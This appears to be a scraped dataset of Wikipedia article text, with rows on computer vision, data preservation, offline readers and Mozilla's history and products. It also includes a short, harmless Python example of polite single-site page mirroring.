This has led to a coarse yet convoluted description of how natural vision systems operate in order to solve certain vision-related tasks. These results have led to a sub-field within computer vision where artificial systems are designed to mimic the processing and behavior of biological systems at different levels of complexity. Also, some of the learning-based methods developed within computer vision (e.g. neural net and deep learning based image and feature analysis and classification) have their background in neurobiology. The Neocognitron, a neural network developed in the 1970s by Kunihiko Fukushima, is an early example of computer vision taking direct inspiration from neurobiology, specifically the primary visual cortex. Some strands of computer vision research are closely related to the study of biological vision—indeed, just as many strands of AI research are closely tied with research into human intelligence and the use of stored knowledge to interpret, integrate, and utilize visual information. The field of biological vision studies and models the physiological processes behind visual perception in humans and other animals. Computer vision, on the other hand, develops and describes the algorithms implemented in software and hardware behind artificial vision systems. An interdisciplinary exchange between biological and computer vision has proven fruitful for both fields. 21 Yet another field related to computer vision is signal processing. Many methods for processing one-variable signals, typically temporal signals, can be extended in a natural way to the processing of two-variable signals or multi-variable signals in computer vision. However, because of the specific nature of images, there are many methods developed within computer vision that have no counterpart in the processing of one-variable signals. Together with the multi-dimensionality of the signal, this defines a subfield in signal processing as a part of computer vision. Robot navigation sometimes deals with autonomous path planning or deliberation for robotic systems to navigate through an environment. 22 A detailed understanding of these environments is required to navigate through them. Information about the environment could be provided by a computer vision system, acting as a vision sensor and providing high-level information about the environment and the robot Besides the above-mentioned views on computer vision, many of the related research topics can also be studied from a purely mathematical point of view. For example, many methods in computer vision are based on statistics, optimization or geometry. Finally, a significant part of the field is devoted to the implementation aspect of computer vision; how existing methods can be realized in various combinations of software and hardware, or how these methods can be modified in order to gain processing speed without losing too much performance. Computer vision is also used in fashion eCommerce, inventory management, patent search, furniture, and the beauty industry. 23 The fields most closely related to computer vision are image processing, image analysis and machine vision. There is a significant overlap in the range of techniques and applications that these cover. This implies that the basic techniques that are used and developed in these fields are similar, something which can be interpreted as there is only one field with different names. 
On the other hand, it appears to be necessary for research groups, scientific journals, conferences, and companies to present or market themselves as belonging specifically to one of these fields and, hence, various characterizations which distinguish each of the fields from the others have been presented. In image processing, the input is an image and the output is an image as well, whereas in computer vision, an image or a video is taken as an input and the output could be an enhanced image, an understanding of the content of an image or even behavior of a computer system based on such understanding. Computer graphics produces image data from 3D models, and computer vision often produces 3D models from image data. 24 There is also a trend towards a combination of the two disciplines, e.g., as explored in augmented reality. The following characterizations appear relevant but should not be taken as universally accepted: Photogrammetry also overlaps with computer vision, e.g., stereophotogrammetry vs. computer stereo vision. Applications range from tasks such as industrial machine vision systems which, say, inspect bottles speeding by on a production line, to research into artificial intelligence and computers or robots that can comprehend the world around them. The computer vision and machine vision fields have significant overlap. Computer vision covers the core technology of automated image analysis which is used in many fields. Machine vision usually refers to a process of combining automated image analysis with other methods and technologies to provide automated inspection and robot guidance in industrial applications. In many computer-vision applications, computers are pre-programmed to solve a particular task, but methods based on learning are now becoming increasingly common. Examples of applications of computer vision include systems for: One of the most prominent application fields is medical computer vision, or medical image processing, characterized by the extraction of information from image data to diagnose a patient. An example of this is the detection of tumours, arteriosclerosis or other malign changes, and a variety of dental pathologies; measurements of organ dimensions, blood flow, etc. are another example. It also supports medical research by providing new information: e.g., about the structure of the brain or the quality of medical treatments. Applications of computer vision in the medical area also include enhancement of images interpreted by humans—ultrasonic images or X-ray images, for example—to reduce the influence of noise. A second application area in computer vision is in industry, sometimes called machine vision, where information is extracted for the purpose of supporting a production process. One example is quality control where details or final products are being automatically inspected in order to find defects. One of the most prevalent fields for such inspection is the Wafer industry in which every single Wafer is being measured and inspected for inaccuracies or defects to prevent a computer chip from coming to market in an unusable manner. Another example is a measurement of the position and orientation of details to be picked up by a robot arm. Machine vision is also heavily used in the agricultural processes to remove undesirable foodstuff from bulk material, a process called optical sorting. 30 Military applications are probably one of the largest areas of computer vision citation needed . 
The obvious examples are the detection of enemy soldiers or vehicles and missile guidance. More advanced systems for missile guidance send the missile to an area rather than a specific target, and target selection is made when the missile reaches the area based on locally acquired image data. Modern military concepts, such as "battlefield awareness", imply that various sensors, including image sensors, provide a rich set of information about a combat scene that can be used to support strategic decisions. In this case, automatic processing of the data is used to reduce complexity and to fuse information from multiple sensors to increase reliability. One of the newer application areas is autonomous vehicles, which include submersibles, land-based vehicles (small robots with wheels, cars, or trucks), aerial vehicles, and unmanned aerial vehicles (UAV). The level of autonomy ranges from fully autonomous (unmanned) vehicles to vehicles where computer-vision-based systems support a driver or a pilot in various situations. Fully autonomous vehicles typically use computer vision for navigation, e.g., for knowing where they are or mapping their environment (SLAM), for detecting obstacles. It can also be used for detecting certain task-specific events, e.g., a UAV looking for forest fires. Examples of supporting systems are obstacle warning systems in cars, cameras and LiDAR sensors in vehicles, and systems for autonomous landing of aircraft. Several car manufacturers have demonstrated systems for autonomous driving of cars. There are ample examples of military autonomous vehicles ranging from advanced missiles to UAVs for recon missions or missile guidance. Space exploration is already being made with autonomous vehicles using computer vision, e.g., NASA's Curiosity and CNSA's Yutu 2 rover. Materials such as rubber and silicon are being used to create sensors that allow for applications such as detecting microundulations and calibrating robotic hands. Rubber can be used in order to create a mold that can be placed over a finger, inside of this mold would be multiple strain gauges. The finger mold and sensors could then be placed on top of a small sheet of rubber containing an array of rubber pins. A user can then wear the finger mold and trace a surface. A computer can then read the data from the strain gauges and measure if one or more of the pins are being pushed upward. If a pin is being pushed upward then the computer can recognize this as an imperfection in the surface. This sort of technology is useful in order to receive accurate data on imperfections on a very large surface. 31 Another variation of this finger mold sensor are sensors that contain a camera suspended in silicon. The silicon forms a dome around the outside of the camera and embedded in the silicon are point markers that are equally spaced. These cameras can then be placed on devices such as robotic hands in order to allow the computer to receive highly accurate tactile data. 32 Other application areas include: Each of the application areas described above employ a range of computer vision tasks; more or less well-defined measurement problems or processing problems, which can be solved using a variety of methods. Some examples of typical computer vision tasks are presented below. 
Computer vision tasks include methods for acquiring, processing, analyzing and understanding digital images, and extraction of high-dimensional data from the real world in order to produce numerical or symbolic information, e.g., in the forms of decisions. 1 2 3 4 Understanding in this context means the transformation of visual images (the input of the retina) into descriptions of the world that can interface with other thought processes and elicit appropriate action. This image understanding can be seen as the disentangling of symbolic information from image data using models constructed with the aid of geometry, physics, statistics, and learning theory. 37 The classical problem in computer vision, image processing, and machine vision is that of determining whether or not the image data contains some specific object, feature, or activity. Different varieties of recognition problem are described in the literature. 38 Currently, the best algorithms for such tasks are based on convolutional neural networks. An illustration of their capabilities is given by the ImageNet Large Scale Visual Recognition Challenge; this is a benchmark in object classification and detection, with millions of images and 1000 object classes used in the competition. 39 Performance of convolutional neural networks on the ImageNet tests is now close to that of humans. 39 The best algorithms still struggle with objects that are small or thin, such as a small ant on the stem of a flower or a person holding a quill in their hand. They also have trouble with images that have been distorted with filters (an increasingly common phenomenon with modern digital cameras). By contrast, those kinds of images rarely trouble humans. Humans, however, tend to have trouble with other issues. For example, they are not good at classifying objects into fine-grained classes, such as the particular breed of dog or species of bird, whereas convolutional neural networks handle this with ease. citation needed Several specialized tasks based on recognition exist, such as: Several tasks relate to motion estimation, where an image sequence is processed to produce an estimate of the velocity either at each points in the image or in the 3D scene or even of the camera that produces the images. Examples of such tasks are: Given one or (typically) more images of a scene, or a video, scene reconstruction aims at computing a 3D model of the scene. In the simplest case, the model can be a set of 3D points. More sophisticated methods produce a complete 3D surface model. The advent of 3D imaging not requiring motion or scanning, and related processing algorithms is enabling rapid advances in this field. Grid-based 3D sensing can be used to acquire 3D images from multiple angles. Algorithms are now available to stitch multiple 3D images together into point clouds and 3D models. 24 Image restoration comes into the picture when the original image is degraded or damaged due to some external factors like lens wrong positioning, transmission interference, low lighting or motion blurs, etc., which is referred to as noise. When the images are degraded or damaged, the information to be extracted from them also gets damaged. Therefore we need to recover or restore the image as it was intended to be. The aim of image restoration is the removal of noise (sensor noise, motion blur, etc.) from images. The simplest possible approach for noise removal is various types of filters, such as low-pass filters or median filters. 
More sophisticated methods assume a model of how the local image structures look to distinguish them from noise. By first analyzing the image data in terms of the local image structures, such as lines or edges, and then controlling the filtering based on local information from the analysis step, a better level of noise removal is usually obtained compared to the simpler approaches. An example in this field is inpainting. The organization of a computer vision system is highly application-dependent. Some systems are stand-alone applications that solve a specific measurement or detection problem, while others constitute a sub-system of a larger design which, for example, also contains sub-systems for control of mechanical actuators, planning, information databases, man-machine interfaces, etc. The specific implementation of a computer vision system also depends on whether its functionality is pre-specified or if some part of it can be learned or modified during operation. Many functions are unique to the application. There are, however, typical functions that are found in many computer vision systems. Image-understanding systems (IUS) include three levels of abstraction as follows: low level includes image primitives such as edges, texture elements, or regions; intermediate level includes boundaries, surfaces and volumes; and high level includes objects, scenes, or events. Many of these requirements are entirely topics for further research. The representational requirements in the designing of IUS for these levels are: representation of prototypical concepts, concept organization, spatial knowledge, temporal knowledge, scaling, and description by comparison and differentiation. While inference refers to the process of deriving new, not explicitly represented facts from currently known facts, control refers to the process that selects which of the many inference, search, and matching techniques should be applied at a particular stage of processing. Inference and control requirements for IUS are: search and hypothesis activation, matching and hypothesis testing, generation and use of expectations, change and focus of attention, certainty and strength of belief, inference and goal satisfaction. 46 There are many kinds of computer vision systems; however, all of them contain these basic elements: a power source, at least one image acquisition device (camera, ccd, etc.), a processor, and control and communication cables or some kind of wireless interconnection mechanism. In addition, a practical vision system contains software, as well as a display in order to monitor the system. Vision systems for inner spaces, as most industrial ones, contain an illumination system and may be placed in a controlled environment. Furthermore, a completed system includes many accessories, such as camera supports, cables, and connectors. Most computer vision systems use visible-light cameras passively viewing a scene at frame rates of at most 60 frames per second (usually far slower). A few computer vision systems use image-acquisition hardware with active illumination or something other than visible light or both, such as structured-light 3D scanners, thermographic cameras, hyperspectral imagers, radar imaging, lidar scanners, magnetic resonance images, side-scan sonar, synthetic aperture sonar, etc. Such hardware captures "images" that are then processed often using the same computer vision algorithms used to process visible-light images. 
While traditional broadcast and consumer video systems operate at a rate of 30 frames per second, advances in digital signal processing and consumer graphics hardware has made high-speed image acquisition, processing, and display possible for real-time systems on the order of hundreds to thousands of frames per second. For applications in robotics, fast, real-time video systems are critically important and often can simplify the processing needed for certain algorithms. When combined with a high-speed projector, fast image acquisition allows 3D measurement and feature tracking to be realized. 47 Egocentric vision systems are composed of a wearable camera that automatically take pictures from a first-person perspective. As of 2016, vision processing units are emerging as a new class of processors to complement CPUs and graphics processing units (GPUs) in this role. 48 |
358 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_preservation | Data preservation is the act of conserving and maintaining both the safety and integrity of data. Preservation is done through formal activities that are governed by policies, regulations and strategies directed towards protecting and prolonging the existence and authenticity of data and its metadata. 1 Data can be described as the elements or units in which knowledge and information is created, 2 and metadata are the summarizing subsets of the elements of data; or the data about the data. 3 The main goal of data preservation is to protect data from being lost or destroyed and to contribute to the reuse and progression of the data. Most historical data collected over time has been lost or destroyed. War and natural disasters combined with the lack of materials and necessary practices to preserve and protect data has caused this. Usually, only the most important data sets were saved, such as government records and statistics, legal contracts and economic transactions. Scientific research and doctoral theses data have mostly been destroyed from improper storage and lack of data preservation awareness and execution. 4 Over time, data preservation has evolved and has generated importance and awareness. We now have many different ways to preserve data and many different important organizations involved in doing so. The first digital data preservation storage solutions appeared in the 1950s, which were usually flat or hierarchically structured. 5 While there were still issues with these solutions, it made storing data much cheaper, and more easily accessible. In the 1970s relational databases as well as spreadsheets appeared. Relational data bases structure data into tables using structured query languages which made them more efficient than the preceding storage solutions, and spreadsheets hold high volumes of numeric data which can be applied to these relational databases to produce derivative data. More recently, non-relational (non-structured query language) databases have appeared as complements to relational databases which hold high volumes of unstructured or semi-structured data. 4 The scope of data preservation is vast. Everything from governmental to business records to art essentially can be represented as data, and is amenable to be lost. This then leads to loss of human history, for perpetuity. Data can be lost on a small or independent scale whether it's personal data loss, or data loss within businesses and organizations, as well as on a larger or national or global scale which can negatively and potentially permanently affect things such as environmental protection, medical research, homeland security, public health and safety, economic development 6 and culture. The mechanisms of data loss are also as many as they are varied, spanning from disaster, wars, data breaches, negligence, all the way through simple forgetting to natural decay. Ways in which data collections can be used when preserved and stored properly can be seen through the U.S. Geological Survey, which stores data collections on natural hazards, natural resources, and landscapes. The data collected by the Survey is used by federal and state land management agencies towards land use planning and management, and continually needs access to historical reference data. 6 In contrast, data holdings are collections of gathered data that are informally kept, and not necessarily prepared for long-term preservation. 
For example, a collection or back-up of personal files. Data holdings are generally the storage methods used in the past when data has been lost due to environmental and other historical disasters. 4 Furthermore, data retention differs from data preservation in the sense that by definition, to retain an object (data) is to hold or keep possession or use of the object. 7 To preserve an object is to protect, maintain and keep up for future use. 8 Retention policies often circle around when data should be deleted on purpose as well, and held from public access, while preservation prioritizes permanence and more widely-shared access. Thus, data preservation exceeds the concept of having or possessing data or back up copies of data. Data preservation ensures reliable access to data by including back-up and recovery mechanisms that precede the event of a disaster or technological change. 9 Digital preservation, is similar to data preservation, but is mainly concerned with technological threats, and solely digital data. Essentially digital data is a set of formal activities to enable ongoing or persistent use and access of digital data exceeding the occurrence of technological malfunction or change. 10 Digital preservation is aware of the inevitable change in technology and protocols, and prepares for data will need to be accessible across new types of technologies and platforms while being the integrity of the data and metadata being conserved. 4 Technology, while providing great process in conserving data that may not have been possible in the past, is also changing at such a quick rate that digital data may not be accessible anymore due to the format being incompatible with new software. Without the use of data preservation much of our existing digital data is at risk. 9 The majority of methods used towards data preservation today are digital methods, which are so far the most effective methods that exist. Archives are a collection of historical documents and records. Archives contribute and work towards the preservation of data by collecting data that is well organized, while providing the appropriate metadata to confirm it. 11 An example of an important data archive is The LONI Image Data Archive, which is an archive that collects data regarding clinical trials and clinical research studies. 12 Catalogues, directories and portals are consolidated resources which are kept by individual institutions, and are associated with data archives and holdings. 4 In other words, the data is not presented on the site, but instead might act as metadata and aggregators, and may administer thorough inventories. 13 Repositories are places where data archives and holdings can be accessed and stored. The goal of repositories is to make sure that all requirements and protocols of archives and holdings are being met, and data is being certified to ensure data integrity and user trust. 4 Single-site Repositories A repository that holds all data sets on a single site. 4 An example of a major single-site repository the Data Archiving and Networking Services which is a repository which provides ongoing access to digital research resources for the Netherlands. 14 Multi-Site Repositories A repository that hosts data set on multiple institutional sites. 4 An example of a well known multi-site repository is OpenAIRE which is a repository that hosts research data and publications collaborating all of the EU countries and more. 
OpenAIRE promotes open scholarship and seeks to improves discover-ability and re-usability of data. 15 Trusted Digital Repository A repository that seeks to provide reliable, trusted access over a long period of time. The repository can be single or multi-sited but must cooperate with the Reference Model for an Open Archival Information System, 16 as well as adhere to a set of rules or attributes that contribute to its trust such as having persistent financial responsibility, organizational buoyancy, administrative responsibility security and safety. 4 An example of a trusted digital repository is The Digital Repository of Ireland (DRI) which is a multi-site repository that hosts Ireland's humanity and social science data sets. 17 Cyber infrastructures which consists of archive collections which are made available through the system of hardware, technologies, software, policies, services and tools. Cyber infrastructures are geared towards the sharing of data supporting peer-to-peer collaborations and a cultural community. 3 An example of a major cyber-infrastructure is The Canadian Geo-spatial Data Infrastructure which provides access to spatial data in Canada. 18 |
359 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Offline_reader | An offline reader (sometimes called an offline browser or offline navigator) is computer software that downloads e-mail, newsgroup posts or web pages, making them available when the computer is offline: not connected to a server. Offline readers are useful for portable computers and dial-up access. Website mirroring software is software that allows for the download of a copy of an entire website to the local hard disk for offline browsing. In effect, the downloaded copy serves as a mirror of the original site. Web crawler software such as Wget can be used to generate a site mirror. Offline mail readers are computer programs that allow users to read electronic mail or other messages (for example, those on bulletin board systems) with a minimum of connection time to the server storing the messages. BBS servers accomplished this by packaging up multiple messages into a compressed file, e.g., a QWK packet, for the user to download using, e.g., Xmodem, Ymodem, Zmodem, and then disconnect. The user reads and replies to the messages locally and packages up and uploads any replies or new messages back to the server upon the next connection. Internet mail servers using POP3 or IMAP4 send the messages uncompressed as part of the protocol, and outbound messages using SMTP are also uncompressed. Offline news readers using NNTP are similar, but the messages are organized into news groups. Most e-mail protocols, like the common POP3 and IMAP4 used for internet mail, need be on-line only during message transfer; the same applies to the NNTP protocol used by Usenet (Network news). Most end-user mailers, such as Outlook Express and AOL, can be used offline even if they are mainly intended to be used online, but some mailers such as Juno are mainly intended to be used offline. Off-line mail readers are generally considered to be those systems that did not originally offer such functionality, notably on bulletin board systems where toll charges and tying up telephone lines were a major concern. Users of large networks such as FidoNet regularly used offline mail readers, and it was also used for UseNet messages on the internet, which is also an on-line system. The two most common formats for FidoNet BBS's were Blue Wave and QWK. Less well-known examples include Silver Xpress's OPX, XRS, OMEM, SOUP and ZipMail. |
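Since the mirroring idea above is close to the web scraping theme of this document, here is a very small Python illustration of the crawl-and-save loop behind it, limited to a handful of pages on a single host. Real mirroring tools such as Wget handle far more (assets, link rewriting, politeness rules); the start URL below is a placeholder.

import os
import time
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse

def mirror(start_url, out_dir="mirror", max_pages=5, pause_s=1.0):
    """Download a page plus a few same-host pages it links to, saving each as a local HTML file."""
    os.makedirs(out_dir, exist_ok=True)
    host = urlparse(start_url).netloc
    to_visit, seen = [start_url], set()
    while to_visit and len(seen) < max_pages:
        url = to_visit.pop(0)
        if url in seen:
            continue
        seen.add(url)
        html = requests.get(url, timeout=30).text
        with open(os.path.join(out_dir, f"page_{len(seen)}.html"), "w", encoding="utf-8") as f:
            f.write(html)
        # queue links that stay on the same host for later visits
        for a in BeautifulSoup(html, "html5lib").find_all("a", href=True):
            link = urljoin(url, a["href"])
            if urlparse(link).netloc == host and link not in seen:
                to_visit.append(link)
        time.sleep(pause_s)   # be polite between requests

# mirror("https://example.com/")   # example.com is a placeholder start page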
360 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Mozilla | Mozilla (stylized as moz: a) is a free software community founded in 1998 by members of Netscape. The Mozilla community uses, develops, publishes and supports Mozilla products, thereby promoting exclusively free software and open standards, with only minor exceptions. 1 The community is supported institutionally by the non-profit Mozilla Foundation and its tax-paying subsidiary, the Mozilla Corporation. 2 Mozilla's current products include the Firefox web browser, Thunderbird e-mail client (now through a subsidiary), the Bugzilla bug tracking system, the Gecko layout engine, and the Pocket "read-it-later-online" service. 3 On January 23, 1998, Netscape announced that its Netscape Communicator browser software would be free, and that its source code would also be free. 4 One day later, Jamie Zawinski of Netscape registered mozilla.org. 5 The project took its name, "Mozilla", from the original code name of the Netscape Navigator browser—a portmanteau of "Mosaic and Godzilla", 6 and used to coordinate the development of the Mozilla Application Suite, the free software version of Netscape's internet software, Netscape Communicator. 7 8 Zawinski said he arrived at the name "Mozilla" at a Netscape staff meeting. 9 A small group of Netscape employees were tasked with coordinating the new community. Mozilla originally aimed to be a technology provider for companies such as Netscape, who would commercialize their free software code. 10 When Netscape's parent company AOL greatly reduced its involvement with Mozilla in July 2003, the Mozilla Foundation was designated the project's legal steward. 11 Soon after, Mozilla deprecated the Mozilla Suite in favor of creating independent applications for each function, primarily the Firefox web browser and the Thunderbird email client, and moved to supply them directly to the public. 12 Mozilla's activities next expanded, and also experienced product terminations, with Firefox on mobile platforms (primarily Android), 13 a mobile OS called Firefox OS (since cancelled), 14 a web-based identity system called Mozilla Persona (since cancelled) and a marketplace for HTML5 applications. 15 In a report released in November 2012, Mozilla reported that their revenue for 2011 was $163 million, up 33% from $123 million in 2010. It noted that roughly 85% of their revenue came from their contract with Google. 16 At the end of 2013, Mozilla announced a deal with Cisco, whereby Firefox would download and use a Cisco-provided binary build of an open-source 17 codec to play the proprietary H.264 video format. 18 19 As part of the deal, Cisco would pay any patent licensing fees associated with the binaries that it distributed. Mozilla's CTO, Brendan Eich, acknowledged that it was "not a complete solution" and wasn't "perfect". 20 An employee in Mozilla's video formats team, writing unofficially, justified it by the need to maintain their large user base, which would be necessary for future battles for truly free video formats. 21 In December 2013, Mozilla announced funding for the development of paid games 22 through its Game Creator Challenge. However, even games that would be released under non-free or free software licenses were required to be made with open web technologies and Javascript. In January 2017 the company rebranded away from its dinosaur symbol in favor of a logo including a : character sequence from a URL: "moz: a". 
23 As a part of the rebranding, it commissioned the open source slab serif font Zilla Slab. 24 In 2020 Mozilla announced it would cut 25% of its worldwide staff of nearly 1,000 to reduce costs. Firefox's market share has fallen from 30% to 4% in 10 years. Despite this, executive pay increased 400%, with Mitchell Baker, Mozilla's top executive, receiving $2.4m in 2018. 25 In December 2020, Mozilla closed its Mountain View office. 26 Seeking new products and roles while sustaining its commitment to Firefox despite the browser's dramatically dwindling market share, Executive Chairwoman and CEO Baker, Chief Product Officer Steve Teixeira and Mozilla Foundation Executive Director Mark Surman told TechCrunch in November 2022 that Mozilla was rethinking its fundamental business models and its role in the internet as a human institution, and that its plan for the next 25 years was still a matter of identifying specific projects for these revised purposes. The one concrete vehicle implemented so far has been the launch of Mozilla Ventures, a $35 million venture fund that the organization plans to use to invest in products and founders who want to build a better, privacy-respecting internet. 27 The Mozilla Manifesto outlines Mozilla's goals and principles. 28 It asserts Mozilla's commitment to the internet, saying: "The open, global internet is the most powerful communication and collaboration resource we have ever seen. It embodies some of our deepest hopes for human progress." It then outlines what Mozilla sees as its place in the development of the internet, stating "The Mozilla project uses a community-based approach to create world-class open source software and to develop new types of collaborative activities". And finally, it lays out its ten principles. According to the Mozilla Foundation: 29 "The Mozilla Foundation pledges to support the Mozilla Manifesto in its activities." Throughout 2020, Mozilla ran Mozilla Builders, "an experimental 'Fix-The-Internet' incubator program". It funded 80 projects through three subprograms: The Startup Studio, The MVP Lab and The Open Lab. 30 The site for this program is now archived. 31 On November 2, 2022, at the Web Summit in Lisbon, Portugal 32 and simultaneously online, Mozilla announced the early 2023 launch of Mozilla Ventures, a venture capital and product incubation facility out of Mozilla for independent start-ups, seed to Series A, which qualify under the ethos of the Mozilla Manifesto, with a starting fund of $35 million. Its founding Managing Partner is Mohamed Nanabhay, who told Entrepreneur India the purpose is "to create an ecosystem of entrepreneurs from across the world who are building companies that create a better internet". 33 Mozilla Foundation President and Executive Director Mark Surman named the first three investment recipients, selected in discussions before Mozilla Ventures was announced, as Secure AI Labs, Block Party and HeyLogin. 34 Firefox is a family of software products developed by Mozilla, with the Firefox browser as the flagship product. 36 37 The Firefox web browser is available in both desktop and mobile versions. It uses the Gecko layout engine to render web pages, which implements current and anticipated web standards. 38 As of late 2015, Firefox had approximately 10–11% of worldwide usage share of web browsers, making it the 4th most-used web browser. 
39 40 41 Firefox began as an experimental branch of the Mozilla codebase by Dave Hyatt, Joe Hewitt and Blake Ross, who believed the commercial requirements of Netscape's sponsorship and developer-driven feature creep compromised the utility of the Mozilla browser. 42 To combat what they saw as the Mozilla Suite's software bloat, they created a stand-alone browser, with which they intended to replace the Mozilla Suite. Firefox was originally named Phoenix but the name was changed to avoid trademark conflicts with Phoenix Technologies. The initially-announced replacement, Firebird, provoked objections from the Firebird project community. 43 44 The current name, Firefox, was chosen on February 9, 2004. 45 It was previously announced that Mozilla would launch a premium version of the Firefox browser by October 2019. The company's CEO, Chris Beard, was quoted by The Next Web: "there is no plan to charge money for things that are now free. So we will roll out a subscription service and offer a premium level. 46 In September, Mozilla revealed their new offering, Firefox Premium Support, at $10 per installation. 47 However, shortly after news broke of the service, Mozilla removed information about it from the website. Computerworld reported that in an email statement, Mozilla claimed "the page outlining that these paid support services for enterprise clients will be available was posted incorrectly. 48 In October 2023, Mozilla announced that consumer 'Firefox accounts' were renamed to 'Mozilla accounts', explicitly indicating a desire to bring the Mozilla brand into greater prominence even with the diminution of some Firefox branding: Over the years, Firefox accounts expanded its role beyond being solely an authentication solution for Firefox Sync. It now serves as Mozilla's main authentication and account management service for a wide range of products and services, supporting millions of active account customers globally. As such, the original “Firefox” branding no longer accurately reflects the broad scope of Mozilla's offerings. The renaming is intended to create a more consistent brand experience across all Mozilla surfaces, driving higher awareness of the portfolio of Mozilla products. 49 Firefox for mobile (codenamed Fennec) is the build of the Mozilla Firefox web browser for mobile devices such as smartphones and tablet computers. Initially available on multiple platforms, it is now available in two versions: Firefox for Android and Firefox for iOS. Firefox for Android runs on the Android mobile operating system and uses the same Gecko layout engine as Mozilla Firefox; for example, version 1.0 used the same engine as Firefox 3.6, and the following release, 4.0, shared core code with Firefox 4.0. Firefox for iOS, which runs on the iOS mobile operating system, does not use the Gecko Layout Engine because of Apple's policy that all iOS apps that browse the web must use the built-in iOS WebKit rendering engine. 50 51 Both version include features like HTML5 support, Firefox Sync, private browsing, web tracking protection, and tabbed browsing, and Firefox for Android also includes support for add-ons. 52 Firefox Focus is a free and open-source privacy-focused mobile browser for Android and iOS. 53 Initially released in 2015 as only a tracker-blocking application for iOS, it has since been developed into a full mobile browser for both iOS and Android. 54 Firefox Lockwise was a password manager offered by Mozilla. 55 On desktop, it was a built-in feature of the Firefox browser. 
On mobile, it was offered as a standalone app that could be set as the device's default password manager. Firefox Monitor is an online service that informs users if their email address and passwords have been leaked in data breaches. 56 Firefox Send was an online encrypted file-transfer service offered by Mozilla. 57 In September 2020, Mozilla announced that it would be decommissioned and would no longer be part of the product lineup. 58 Mozilla VPN, formerly Firefox Private Network, is a subscription-based VPN and a free privacy extension. 59 60 Firefox Private Relay provides users with disposable email addresses that can be used to combat spam (by hiding the user's real email address) and manage email subscriptions by categorizing them based on the party a particular address was given to. 61 Firefox Relay was first released as a Firefox add-on on April 9, 2020. Mozilla announced the Firefox Relay Premium monthly subscription service, ending the beta version of Firefox Relay, on November 19, 2021. In addition, subscribers can receive unlimited alias emails of the form username@mozmail.com; these mozmail.com addresses replaced the pseudonymous relay.firefox.com addresses provided previously. In September 2018, Mozilla announced that its VR version was ready for consumers to download. Called Firefox Reality, the browser was built entirely for virtual reality. It is currently available on the Oculus. 62 In January 2019, HTC announced its partnership with Mozilla, under which the Firefox Reality web browser has been made available on Vive headsets. 63 In February 2022, Mozilla announced that Igalia had assumed stewardship of the project, whose name was changed to Wolvic. 64 Mozilla no longer supports Firefox Reality. 65 Firefox OS (project name: Boot to Gecko, also known as B2G) is a free software operating system developed by Mozilla to support HTML5 apps written using "open Web" technologies rather than platform-specific native APIs. The concept behind Firefox OS is that all user-accessible software will be HTML5 applications, using Open Web APIs to access the phone's hardware directly via JavaScript. 66 Some devices using the OS include 67 Alcatel One Touch Fire, ZTE Open, and LG Fireweb. Mozilla announced the end of Firefox OS development in December 2015. A fork of B2G, KaiOS, has continued development and ships with numerous low-cost devices. Pocket is a mobile application and web service for managing a reading list of articles from the Internet. It was announced that it would be acquired by the Mozilla Corporation, the commercial arm of Mozilla's non-profit development group, on February 27, 2017. 68 Originally designed only for desktop browsers, 69 it is now available for macOS, Windows, iOS, Android, Windows Phone, BlackBerry, Kobo eReaders, and web browsers. 70 Thunderbird is a free software, cross-platform email and news client developed by the volunteers of the Mozilla Community. On July 16, 2012, Mitchell Baker announced that Mozilla's leadership had come to the conclusion that ongoing stability was the most important thing for Thunderbird and that innovation in Thunderbird was no longer a priority for Mozilla. In that update, Baker also suggested that Mozilla had provided a pathway for its community to innovate around Thunderbird if the community chose to. 71 On July 11, 2023, the Thunderbird blog announced the release of a new version of Thunderbird called Supernova. 
It features a new, modernized user interface, among other new features. Changes have also been made to the older underlying code structure to make "maintenance and extensibility easier". 72 SeaMonkey (formerly the Mozilla Application Suite) is a free and open-source cross-platform suite of Internet software components including a web browser component, a client for sending and receiving email and Usenet newsgroup messages, an HTML editor (Mozilla Composer) and the ChatZilla IRC client. On March 10, 2005, the Mozilla Foundation announced that it would not release any official versions of Mozilla Application Suite beyond 1.7.x, since it had now focused on the stand-alone applications Firefox and Thunderbird. 73 SeaMonkey is now maintained by the SeaMonkey Council, which has trademarked the SeaMonkey name with help from the Mozilla Foundation. 74 The Mozilla Foundation provides project hosting for the SeaMonkey developers. Bugzilla is a web-based general-purpose bug tracking system, which was released as free software by Netscape Communications in 1998 along with the rest of the Mozilla codebase, and is currently stewarded by Mozilla. It has been adopted by a variety of organizations for use as a bug tracking system for both free and open-source software and proprietary projects and products, including the Mozilla Foundation, the Linux kernel, KDE, Red Hat, Eclipse and LibreOffice. 75 WebThings is a framework that allowed management of IoT devices through a single framework, gateway and UI. 76 77 78 It was based on the W3C Web of Things standard. Since 2020, it has no longer been affiliated with Mozilla. 79 It was spun off as an independent project following layoffs in 2020. It was known as Project Things and allowed users to use a Raspberry Pi as a gateway for IoT management with decentralized software. Network Security Services (NSS) comprises a set of libraries designed to support cross-platform development of security-enabled client and server applications. NSS provides a complete free software implementation of crypto libraries supporting SSL and S/MIME. NSS is licensed under the GPL-compatible Mozilla Public License 2.0. AOL, Red Hat, Sun Microsystems (now Oracle Corporation), Google and other companies and individual contributors have co-developed NSS, and it is used in a wide range of non-Mozilla products including Evolution, Pidgin, and LibreOffice. SpiderMonkey is the original JavaScript engine developed by Brendan Eich when he invented JavaScript in 1995 as a developer at Netscape. It became part of the Mozilla product family when Mozilla inherited Netscape's code-base in 1998. In 2011, Eich transferred the nominal ownership of the SpiderMonkey code and project to Dave Mandelin. 80 SpiderMonkey is a cross-platform engine written in C++ which implements ECMAScript, a standard developed from JavaScript. 80 81 It comprises an interpreter, several just-in-time compilers, a decompiler and a garbage collector. Products which embed SpiderMonkey include Firefox, Thunderbird, SeaMonkey, and many non-Mozilla applications. 82 Rhino is a free software JavaScript engine managed by the Mozilla Foundation. Developed entirely in Java, it converts JavaScript scripts into Java classes. It works in both compiled and interpreted mode. 83 Gecko is a layout engine that supports web pages written using HTML, SVG, and MathML. Written in C++, it uses NSPR for platform independence. Its source code is licensed under the Mozilla Public License. Firefox uses Gecko for rendering web pages and for rendering its user interface. 
